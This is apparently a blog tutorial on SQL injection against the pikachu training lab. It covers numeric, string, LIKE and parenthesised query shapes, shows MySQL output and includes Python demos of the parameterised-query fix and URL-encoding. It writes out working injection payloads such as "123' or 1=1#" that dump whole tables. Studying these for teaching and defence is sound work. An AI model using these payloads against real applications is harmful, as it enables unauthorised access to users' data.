Security: database SELECT injection (2)

How the injection works (2)

The SQL query behind a typical web page can have its WHERE condition altered so that it returns every row instead of the one the developer intended.
select username,email from member where id=1 or 1=1;
# Adding an extra, always-true condition (1=1) makes the query return every row of the table.

Numeric injection

Application code: select username,email from member where id=$id

SQL run:
mysql> select username,email from member where id=1;
+----------+-------------------+
| username | email             |
+----------+-------------------+
| vince    | vince@pikachu.com |
+----------+-------------------+
1 row in set (0.02 sec)


mysql> select username,email from member where id=1 or 1=1;
+----------+-------------------+
| username | email             |
+----------+-------------------+
| vince    | vince@pikachu.com |
| allen    | allen@pikachu.com |
| kobe     | kobe@pikachu.com  |
| grady    | grady@pikachu.com |
| kevin    | kevin@pikachu.com |
| lucy     | lucy@pikachu.com  |
| lili     | lili@pikachu.com  |
+----------+-------------------+
7 rows in set (0.03 sec)


How do you alter the select statement to get more data?
A number is not quoted, so the input is concatenated straight into the SQL: submit 1 or 1=1 and the second query above is exactly what the database executes.

String injection

Application code: select id,email from member where username='$name'

SQL run:
mysql> select id,email from member where username='123' or 1=1;
+----+-------------------+
| id | email             |
+----+-------------------+
|  1 | vince@pikachu.com |
|  2 | allen@pikachu.com |
|  3 | kobe@pikachu.com  |
|  4 | grady@pikachu.com |
|  5 | kevin@pikachu.com |
|  6 | lucy@pikachu.com  |
|  7 | lili@pikachu.com  |
+----+-------------------+
7 rows in set (0.05 sec)

How do you alter the select statement to get more data?
The form value = the string you type = $name. Note that the two surrounding quotes '' are NOT part of it:
select id,email from member where username='$name'

So for your input to be parsed as SQL syntax, you must deal with closing the quote.
Whatever you submit is wrapped in quotes by the application, so $name itself has to turn '$name' into '123' or 1=1 ... and then get rid of the trailing quote the application appends.

Typing 123' or 1=1# into the form does exactly that: the 123' closes the opening quote, or 1=1 is the injected condition, and # starts a MySQL line comment that swallows the trailing quote.
select id,email from member where username='$name'
select id,email from member where username='123' or 1=1#'

Search (LIKE) injection

Application code:  select username,id,email from member where username like '%$name%'

SQL run:
mysql> select username,id,email from member where username like '%123%' or 1=1;
+----------+----+-------------------+
| username | id | email             |
+----------+----+-------------------+
| vince    |  1 | vince@pikachu.com |
| allen    |  2 | allen@pikachu.com |
| kobe     |  3 | kobe@pikachu.com  |
| grady    |  4 | grady@pikachu.com |
| kevin    |  5 | kevin@pikachu.com |
| lucy     |  6 | lucy@pikachu.com  |
| lili     |  7 | lili@pikachu.com  |
+----------+----+-------------------+
7 rows in set (0.04 sec)


How do you alter the select statement to get more data?

From the application code we see that the LIKE match wraps the input in two percent signs, %...%.

How to transform it?
Submit value = 123%' or 1=1#  to close both the pattern and the quote.
'%$name%' becomes '%123%' or 1=1#%'
Because # comments out the trailing %', what the database effectively executes is:
select username,id,email from member where username like '%123%' or 1=1;

The WHERE clause is now two conditions joined by OR: username like '%123%' (matches no row) or 1=1 (true for every row). OR is true when either side is true, so every row is returned.



xx-type injection (value wrapped in parentheses)

Application code: select id,email from member where username=('$name')

mysql> select id,email from member where username=('lili');
+----+------------------+
| id | email            |
+----+------------------+
|  7 | lili@pikachu.com |
+----+------------------+
1 row in set (0.04 sec)

MySQL treats the parentheses as plain grouping; the query means the same with or without them.
mysql> select id,email from member where username='lili';
+----+------------------+
| id | email            |
+----+------------------+
|  7 | lili@pikachu.com |
+----+------------------+
1 row in set (0.05 sec)


How do you alter the select statement to get more data?
Submit:  lili') or 1=1#

Closing the backend SQL's quote and bracket with ') makes the injected condition execute. The # is needed here for the same reason as in the string case: without it the template's trailing ') is left dangling and the statement is a syntax error.
mysql> select id,email from member where username=('lili') or 1=1;
+----+-------------------+
| id | email             |
+----+-------------------+
|  1 | vince@pikachu.com |
|  2 | allen@pikachu.com |
|  3 | kobe@pikachu.com  |
|  4 | grady@pikachu.com |
|  5 | kevin@pikachu.com |
|  6 | lucy@pikachu.com  |
|  7 | lili@pikachu.com  |
+----+-------------------+
7 rows in set (0.04 sec)
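The four query shapes above (numeric, string, search and xx-type) all come down to the same mechanic: the form value is pasted into the SQL text, so the attacker ends the literal the template opened, adds an always-true condition, and comments out whatever the template appends afterwards. The following is an added example, not code from the original post or from the pikachu lab: it rebuilds the member table in an in-memory SQLite database (the seven users are taken from the page's mysql output), runs each payload through the vulnerable concatenation, shows that the xx-type payload without a comment terminator is a syntax error, and runs the same inputs through parameterised queries. Because SQLite does not accept MySQL's # line comment, the payloads end with the portable `-- ` instead; everything else matches the page.

```python
import sqlite3

# Constructed sample data: the seven pikachu-lab users shown in the page's
# mysql output, loaded into an in-memory SQLite database so this runs offline.
MEMBERS = [
    (1, "vince", "vince@pikachu.com"),
    (2, "allen", "allen@pikachu.com"),
    (3, "kobe", "kobe@pikachu.com"),
    (4, "grady", "grady@pikachu.com"),
    (5, "kevin", "kevin@pikachu.com"),
    (6, "lucy", "lucy@pikachu.com"),
    (7, "lili", "lili@pikachu.com"),
]

# MySQL accepts '#' as a line comment (what the page uses); SQLite does not,
# so the payloads below end with '-- ', which both engines accept.
COMMENT = "-- "

# The four query shapes from the page, built the way the vulnerable
# application builds them: the form value is pasted into the SQL text.
TEMPLATES = {
    "numeric": "select username,email from member where id={v}",
    "string":  "select id,email from member where username='{v}'",
    "search":  "select username,id,email from member where username like '%{v}%'",
    "xx":      "select id,email from member where username=('{v}')",
}

# Each payload ends the literal the template opened, adds OR 1=1, then
# comments out whatever the template appends after the value.
PAYLOADS = {
    "numeric": "1 or 1=1",                 # nothing to close: no quotes
    "string":  "123' or 1=1" + COMMENT,    # closes '...'
    "search":  "123%' or 1=1" + COMMENT,   # closes '%...%'
    "xx":      "lili') or 1=1" + COMMENT,  # closes ('...')
}


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table member (id integer primary key, username text, email text)")
    conn.executemany("insert into member values (?, ?, ?)", MEMBERS)
    return conn


def vulnerable_query(kind, user_input):
    """Concatenate the input into the template and run it. Returns (sql, rows)."""
    sql = TEMPLATES[kind].format(v=user_input)
    return sql, make_db().execute(sql).fetchall()


def vulnerable_row_count(kind, user_input):
    return len(vulnerable_query(kind, user_input)[1])


def parses(kind, user_input):
    """True if the concatenated SQL is syntactically valid (no dangling quote)."""
    try:
        vulnerable_query(kind, user_input)
        return True
    except sqlite3.OperationalError:
        return False


def safe_row_count(kind, user_input):
    """Same queries with bound parameters: the input is always data, never SQL."""
    conn = make_db()
    if kind == "numeric":
        try:
            value = int(user_input)  # reject anything that is not a number
        except ValueError:
            return 0
        sql, params = "select username,email from member where id=?", (value,)
    elif kind == "string":
        sql, params = "select id,email from member where username=?", (user_input,)
    elif kind == "search":
        # Still a pattern: % and _ typed by the user remain wildcards, but
        # quotes and comments in the input can no longer change the statement.
        sql, params = ("select username,id,email from member where username like ?",
                       ("%" + user_input + "%",))
    else:  # "xx"
        sql, params = "select id,email from member where username=(?)", (user_input,)
    return len(conn.execute(sql, params).fetchall())


if __name__ == "__main__":
    for kind, payload in PAYLOADS.items():
        sql, rows = vulnerable_query(kind, payload)
        print(f"[{kind}] {sql!r} -> {len(rows)} rows; parameterised -> {safe_row_count(kind, payload)} rows")
```

Running it prints the concatenated statement for each shape together with the row count: every payload returns all seven rows through concatenation and zero rows through the parameterised version, while a legitimate value such as lili returns one row either way. parses("xx", "lili') or 1=1") returns False, which is the dangling-bracket error discussed above.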

Classification by how the injection is submitted

OPTIONS request

OPTIONS returns which request methods the backend accepts.

GET request

The payload travels in the URL, so it has to be URL-encoded. This matters most for the # used above: in a URL a raw # starts the fragment, which the browser never sends, so the comment terminator would silently disappear and the query would fail on the dangling quote. Quotes and spaces should be percent-encoded too.

POST request

A POST payload does not need to be hand-encoded: the browser URL-encodes the form body itself and the server decodes it before the value reaches the query, so the # arrives intact.
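To make the GET/POST difference concrete, here is an added example (not code from the original post) using only Python's urllib.parse. It takes the string-injection payload 123' or 1=1# from above and shows what the server actually recovers when the payload is typed raw into the address bar, when it is percent-encoded, and when the browser builds a POST form body from it. The endpoint URL and the parameter name `name` are assumptions for illustration, not values from the page.

```python
from urllib.parse import parse_qs, quote, urlencode, urlsplit

# Constructed example: the page's string-injection payload sent to a
# hypothetical search endpoint (URL and parameter name are assumptions).
BASE = "http://127.0.0.1/search.php"
PAYLOAD = "123' or 1=1#"


def raw_get_url(base, payload):
    """Payload typed straight into the address bar, unencoded."""
    return f"{base}?name={payload}"


def encoded_get_url(base, payload):
    """Payload percent-encoded so every character survives the trip."""
    return f"{base}?name={quote(payload, safe='')}"


def server_sees(url):
    """What a server-side framework recovers for ?name= from the URL.
    A raw # begins the fragment, which is never sent, so the query string
    stops there and the comment terminator is lost."""
    query = urlsplit(url).query
    return parse_qs(query, keep_blank_values=True).get("name", [""])[0]


def post_body(payload):
    """An application/x-www-form-urlencoded body as the browser builds it for
    a POST form: the user types the raw payload, the browser encodes it."""
    return urlencode({"name": payload})


def server_sees_body(body):
    """What the server recovers from the decoded POST body."""
    return parse_qs(body, keep_blank_values=True)["name"][0]


if __name__ == "__main__":
    raw, enc, body = raw_get_url(BASE, PAYLOAD), encoded_get_url(BASE, PAYLOAD), post_body(PAYLOAD)
    print("raw GET     :", raw, "->", repr(server_sees(raw)))
    print("encoded GET :", enc, "->", repr(server_sees(enc)))
    print("POST body   :", body, "->", repr(server_sees_body(body)))
```

The raw GET hands the server 123' or 1=1 with the # cut off, which is the dangling-quote syntax error; the encoded GET (name=123%27%20or%201%3D1%23) and the POST body (name=123%27+or+1%3D1%23) both decode back to the full payload.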


Posted 2022-01-19 15:58 by mmszxc